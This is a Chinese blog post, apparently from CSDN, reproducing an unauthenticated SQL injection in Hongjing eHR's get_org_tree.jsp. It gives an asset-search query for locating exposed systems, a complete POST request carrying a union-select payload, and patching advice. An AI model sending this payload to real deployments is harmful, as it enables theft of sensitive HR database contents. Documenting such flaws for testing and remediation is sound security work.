宏景eHR get_org_tree.jsp SQL注入漏洞复现

最新推荐文章于 2024-09-04 13:58:18 发布
最新推荐文章于 2024-09-04 13:58:18 发布
阅读量901 收藏 9
点赞数 6
分类专栏: 漏洞复现 文章标签: sql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135675927
版权
宏景eHR的人力资源管理软件存在SQL注入漏洞,攻击者可通过get_org_tree.jsp接口执行任意SQL,威胁数据安全。建议升级至最新版本并部署防火墙进行防护。
摘要由CSDN通过智能技术生成

产品简介

宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件.

漏洞概述

宏景eHR zp_options/get_org_tree.jsp接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

资产测绘

app=“HJSOFT-HCM”

漏洞复现

POST /templates/attestation/../../hire/zp_options/get_org_tree.jsp HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 42

params=1=0 union select 1,@@version,3,4--+

在这里插入图片描述
sqlmap验证:
在这里插入图片描述

修复建议

1.升级至系统最新版本。
2.部署Web应用防火墙,对数据库操作进行监控。

keepb1ue
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
0xSec
05-30 4997
宏景eHR 存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
宏景-zp_options-get_org_tree-SQL注入漏洞-未公开Day漏洞复现
weixin_43167326的博客
01-21 398
宏景人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件,旨在帮助企事业单位构建高绩效组织,推动组织健康成长,提升组织软实力。系统功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。
【1day】复现宏景OA KhFieldTree接口 SQL注入漏洞
记录并分享学习安全的知识点..
10-17 462
宏景OA是一款基于云计算和SaaS模式的企业级办公自动化软件,它为企业提供了全面的办公自动化解决方案,包括协同办公、流程管理、文档管理、知识管理、人力资源管理、客户关系管理等多个模块。它可以帮助企业提高工作效率、降低成本、提高管理水平和企业形象。宏景OA KhFieldTree接口存在 SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。 ​
【1day】复现宏景HCM codesettree SQL注入漏洞(CNVD-2023-08743)
记录并分享学习安全的知识点..
07-26 1301
北京宏景世纪软件股份有限公司 HCM codesettree 接口存在SQL注入漏洞,攻击者通过漏洞可以获取到登陆系统的账号密码和数据库信息。
【1day】宏景OA SmsAcceptGSTXServlet接口 XXE漏洞学习——可读取任意文件
记录并分享学习安全的知识点..
09-16 597
宏景OA是一款基于云计算和SaaS模式的企业级办公自动化软件,它为企业提供了全面的办公自动化解决方案,包括协同办公、流程管理、文档管理、知识管理、人力资源管理、客户关系管理等多个模块。它可以帮助企业提高工作效率、降低成本、提高管理水平和企业形象。宏景OA SmsAcceptGSTXServlet接口存在xxe漏洞,攻击者可以利用它来获取敏感信息、控制应用程序、破坏内部网络安全等,从而对企业造成严重的损失。
漏洞复现宏景ehr-hcm-templates-文件读取
知黑而守白
01-11 227
宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。宏景HCM系统templates接口存在文件读取漏洞。攻击者可以通过发送特定的POST请求,利用该漏洞获取系统敏感文件。
宏景eHR知识型企业管理策略.doc
11-29
宏景eHR知识型企业管理策略】 在当前的数字化时代,知识型企业的崛起对人力资源管理提出了新的挑战。宏景eHR系统就是针对这类企业的特点,提供了高效、灵活的解决方案,以适应知识型企业的矩阵组织结构、高流动性...
宏景eHR数据字典
08-26
宏景eHR数据字典,
宏景软件考勤管理解决方案样本.doc
12-06
宏景软件考勤管理解决方案样本.doc 宏景软件考勤管理解决方案样本是一种人力资源管理系统的模块,旨在解决企业中的人事工作中的考勤管理问题。该解决方案能够满足不同单位的需求,提供了C/S和B/S两个版本的考勤模块...
宏景软件考勤管理解决方案.docx
11-16
宏景软件考勤管理解决方案 宏景软件考勤管理解决方案是人事工作中的一项根底性管理任务,为工资核算、劳动纪律管理、绩效考核等各项人事工作提供根底性信息。该解决方案提供了多种考勤方式和假期管理的考勤管理模块...
被低估的SQL
weixin_61431494的博客
09-03 1183
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
SQL Server数据库日志占满硬盘 运行不了了怎么办
最新发布
一只没有感情的AI机械猿
09-04 610
如果不需要完整恢复模式,可以将数据库恢复模式改为简单恢复模式(Simple Recovery Model),这样会自动截断日志,减少日志文件的增长。- 如果数据库运行在完整恢复模式下(Full Recovery Model),你应该先进行事务日志备份。这样可以截断日志并释放空间。- 检查数据库和应用程序是否存在大量事务未提交或长时间运行的事务,这些都可能导致日志文件急剧增长。- 定期备份事务日志并收缩日志文件,防止日志文件再次占满磁盘空间。- 备份完成后,日志会自动截断,释放一些空间。
达梦数据库:获取建表SQL、创建索引SQL、DBMS_METADATA.GET_DDL
weixin_52116015的博客
09-03 605
达梦数据库:获取建表SQL、创建索引SQL、DBMS_METADATA.GET_DDL
SQL】跳过记录筛选第二名
Frost_Descent的博客
09-03 995
当从数据库表中查询数据时,如果表中某列包含重复的值,而又只想获取这些值的唯一列表,那么就可以使用。,那么 SQL 会返回这些列组合起来的唯一值。子句通常一起使用来限制查询结果的数量,并指定从哪里开始获取这些结果。这通常用于获取查询结果的第二行数据(假设结果集是按某种顺序排列的,比如按主键或某个特定的列排序)。可以考虑使用 ifNull(查询,null)方法,或者通过外层再加一层查询,使其作为临时表。在某些数据库系统中(如SQL Server),可能需要使用不同的语法来实现分页,比如。id 是这个表的主键。
【BUUCTF】HardSQL
徐徐徐的博客
09-04 493
使用以下字符替代空格,可以起到相同效果或使用和。
【Postgresql】地理空间数据的存储与查询,查询效率优化策略,数据类型与查询速度的影响
走在搬砖的路上!
09-03 1315
地理空间数据的存储与查询,查询效率优化策略,数据类型与查询速度的影响,使用postgresql数据库会用到PostGIS 扩展。
Flink SQL 中常见的数据类型
RodJohnsonDoctor的专栏
09-03 330
通过了解Flink SQL 中常见的数据类型,掌握正确编写Flink SQL 语句
SQL Server 中 事务( Transaction )
2302_77639120的博客
09-04 1067
SQL Server 中,(事务)是一种处理单位,它由一系列操作组成,这些操作要么全部成功,要么全部失败。事务是数据库管理系统中的一个核心概念,用于确保数据的完整性和一致性。
宏景 get_org_tree-sqli
11-30
宏景 get_org_tree-sqli是一种SQL注入攻击。在宏景软件的get_org_tree函数中,存在着未经过滤或者验证的用户输入,导致攻击者可以通过构造恶意的SQL查询语句来对数据库进行未授权的访问和操作。 当应用程序没有正确地对用户输入进行过滤、转义或验证时,攻击者可以利用这个漏洞构造恶意的输入来执行SQL查询语句。攻击者可以注入SQL代码,修改数据库查询语句的逻辑,获取、删除或修改数据库中的数据,甚至完全控制数据库服务器。 为了防止宏景 get_org_tree-sqli攻击,开发人员应该始终遵循安全的编码实践。 1. 输入验证和过滤:应该对所有的用户输入进行验证和过滤,确保输入数据符合预期的格式和类型。可以使用合适的输入验证函数或正则表达式来实现。 2. 使用参数化查询或预处理语句:建议使用参数化查询或预处理语句来执行数据库查询操作,而不是直接拼接用户输入构成的查询语句。参数化查询可以防止SQL注入攻击。 3. 最小权限原则:数据库账户应该按照最小权限原则进行授权,避免给予不必要的权限。这样即使发生了SQL注入攻击,攻击者也只能执行有限的操作。 4. 错误信息处理:避免将详细的错误信息直接输出到用户界面上,这样可能会暴露敏感的数据库结构和错误详情,为攻击者提供攻击的线索。可以将错误信息记录在日志文件中,以便日后的安全审计和调查。 通过以上措施,开发人员可以提高应用程序的安全性,防止宏景 get_org_tree-sqli等SQL注入攻击对系统造成威胁。同时,定期对应用程序进行安全测试和漏洞扫描,及时修复和更新系统中发现的安全漏洞,保障系统安全运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值